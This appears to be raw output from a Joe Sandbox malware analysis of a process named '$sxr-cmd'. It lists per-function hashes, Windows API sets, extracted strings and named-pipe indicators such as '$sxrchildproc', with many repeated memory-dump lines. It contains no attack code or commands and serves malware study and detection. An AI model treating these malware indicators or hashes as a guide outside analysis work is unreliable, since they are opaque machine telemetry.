• Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
• Instruction ID: 818c81af3e53eb30f0c1dbcc7a3dec23b9ea7a7799b5932c5373529bd540b7bb
• Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
• Instruction Fuzzy Hash: 1A315D25A08D0285F7D07F25E890379E6A8BF88BA0FC48435DA5E666A5DE3DE40CC731
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 2516562204-381716982
• Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
• Instruction ID: bdba72ce4105ede08c6e761d4fa9aa1589bf219ce7010f67e20ae223c78b5560
• Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
• Instruction Fuzzy Hash: 0CC1D672B14B518AE790AF25E84027DB7A0FB48BA4F845135DE8D23B94DF3DE469C720
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF7137ED3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED46E
  • Part of subcall function 00007FF7137ED3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED485
  • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED4EE
  • Part of subcall function 00007FF7137ED3F0: iswspace.MSVCRT ref: 00007FF7137ED54D
  • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED569
  • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED58C
• iswspace.MSVCRT ref: 00007FF7137F7EEE
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess
• String ID: A
• API String ID: 3731854180-3554254475
• Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
• Instruction ID: c75d466a852547f1441658d0acca5e6b6477a8843d12117dfb3266dc756e372b
• Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
• Instruction Fuzzy Hash: 26A19061909E82C9E7A0BB11A450279F6E4FF497A0F808035DA5DA7794DF3DE46EC730
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: MemoryProcessRead$AddressLibraryLoadProc
• String ID: NTDLL.DLL$NtQueryInformationProcess
• API String ID: 1580871199-2613899276
• Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
• Instruction ID: 404622d72fec3cfe62583b069c8fc4a1fd658d71d3aa97e8484cfa81ddeab1e4
• Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
• Instruction Fuzzy Hash: 5F51B372A18F8286EB909B55E400279F7F4FB88BA4F845235DA5D27744DF3DD029C720
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
• String ID: con
• API String ID: 689241570-4257191772
• Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
• Instruction ID: 55f89d60d49aac84793439e178455dbc95548549bf21975df2bf6cc317b35127
• Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
• Instruction Fuzzy Hash: 8541B132A08A4586E350AF159484379FAA4FB8ABB4F948334DA6D673D0CF7DD84DC760
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
• String ID: PE
• API String ID: 2941894976-4258593460
• Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
• Instruction ID: 1e571bdddd30f063e4b51cf76c64c49abb76a64191e6f01041036dbfc378070d
• Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
• Instruction Fuzzy Hash: 26415562608A5186F7A0AB11E450679FBE0FB89BA0F844230DE5D17B95DF3EE459CB30
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
• API String ID: 2171963597-1213686612
• Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
• Instruction ID: 8ad1e9c30e7bd4d6325c55104014fdf7ecfbe2687ca43c98f297bb13caecb895
• Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
• Instruction Fuzzy Hash: 3C217136614B54E2FB10CB25F458799B3A2F3E5BA9F900255EB5A02BA8DF3CC14DCB00
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF71380849D,?,?,?,00007FF71380F0C7), ref: 00007FF7137F0045
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF71380F0C7,?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF7137F0071
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F0092
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7137F00A7
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F0148
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7137F0181
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
• String ID:
• API String ID: 734197835-0
• Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
• Instruction ID: 133a2dfacb88b2b925857e5460d8ca9b4d66ce2a758b3b54f0b18e7b8ae25951
• Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
• Instruction Fuzzy Hash: 5961D432A0CE928AE3A1BB11A840339FA94FB49764F848131DD6E63794DF7DE41CC720
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Enum$Openwcsrchr
• String ID: %s=%s$.$\Shell\Open\Command
• API String ID: 3402383852-1459555574
• Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
• Instruction ID: 0d953309abcc0be7c4bb8e621d5becd839b2e21b27a5a8bab54d274caa1d9178
• Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
• Instruction Fuzzy Hash: 71A1A361A09E4282EF90AB5590502BAE2E0FF85BB0FC44531DA5D2B7E4DF7ED959C330
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$wcscmp
• String ID: %s
• API String ID: 243296809-3043279178
• Opcode ID: 35b6f1010dc1ef857b77676c4f7a499f7a1f1047feda36267f0d1b8956f40b96
• Instruction ID: ae5d37ffa45314bf27acf194f82f51a372f580574359ba83a656699f0a68d4a7
• Opcode Fuzzy Hash: 35b6f1010dc1ef857b77676c4f7a499f7a1f1047feda36267f0d1b8956f40b96
• Instruction Fuzzy Hash: E3A19322709BC696EBA1EB21D8803F9A395FB4C7A8F904135CA5D57695DF3CE64CC320
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$EnvironmentVariable
• String ID: DIRCMD
• API String ID: 1405722092-1465291664
• Opcode ID: b57441518c80c6c975e78a206d29843445d204bab782f52da51c6cf931825d4e
• Instruction ID: 6633c139d9d0e7b4c3d4118fa803aaa425a819b88f71cf1c88f6e021d4a44433
• Opcode Fuzzy Hash: b57441518c80c6c975e78a206d29843445d204bab782f52da51c6cf931825d4e
• Instruction Fuzzy Hash: 98816072A18BC28AEB60EF60E8802ED77A5FB48758F504139DA4D77B58DF38D2598710
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
• String ID: FOR$ IF
• API String ID: 557945885-2924197646
• Opcode ID: 012d4e0aad7e1382614acb10a6537d507bdfce538949b726c19ff0d56bac9c31
• Instruction ID: e47938f32e72be3a209bdc3edcc99f742a0bc22bc730961b248fd2ecd914ef1f
• Opcode Fuzzy Hash: 012d4e0aad7e1382614acb10a6537d507bdfce538949b726c19ff0d56bac9c31
• Instruction Fuzzy Hash: C9519C21B09E4285FE94BB259490279A691BF8DBB0BC84235D92E777D1DE3CA80DC370
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: iswdigit$iswspacewcschr
• String ID: )$=,;
• API String ID: 1959970872-2167043656
• Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
• Instruction ID: 923196bc6ffc9c564d2f85415a012f2558191f06133763861d6b238fd77a2293
• Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
• Instruction Fuzzy Hash: 2841CF66E08E5685FBE06F15A484379F6A0BF19771FC54231CA8D32AA0DF3CA49D8730
Uniqueness
Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                            • String ID: %04X-%04X$:
                                                                                                            • API String ID: 930873262-1938371929
                                                                                                            • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                            • Instruction ID: a4dad5fbf99fddd9a16597a33b49c86a8f5a303b10cdcc3942712a5ee1901fb5
                                                                                                            • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                            • Instruction Fuzzy Hash: 49417021A08E42C6FBA1AB60E4502BAE6A0FB88720FC04135D99D676D5DF7ED55DC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                            • String ID: d
                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                            • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction ID: 6fb92bfacac448434563605237513f3020ce1b1d14753658103401a21867c811
                                                                                                            • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction Fuzzy Hash: A8418333614B94EBEB608F51E5487DAB7A2F399799F408125EB8907B58DF38D158CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                            • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                            • API String ID: 3249344982-2616576482
                                                                                                            • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                            • Instruction ID: 260ced913d1dfc1ad1608cfb4cf4de978366554741c46f2c706c5185df52fdc6
                                                                                                            • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                            • Instruction Fuzzy Hash: 70416F72618F4186F3909F12A884769FAA4FB4DBE4F844238DA4E17B94CF7DD018CB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$iswdigit
                                                                                                            • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                            • API String ID: 2770779731-632268628
                                                                                                            • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                            • Instruction ID: 9bdf456648589e8ebf1ad5e51906ab4fced671ae921061500d75042b170560d1
                                                                                                            • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                            • Instruction Fuzzy Hash: B0315C22A08F56C5EB90AF11E490278B7E4FB49FA5B958135DA5E23354EF3DE81CC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: f4dfcc18c15c868bdd044af8da8f32cc177cd271fbdd49f31caf34b4bcce3ba0
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: 10810531602E28FAFE509B36984DFD96293B7E7B8EFD44494BA0647796DB38C40D8700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: 5b1ae83516856f57822cff817a483ad25a540ed52fee580306a7bc6bc9609a31
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
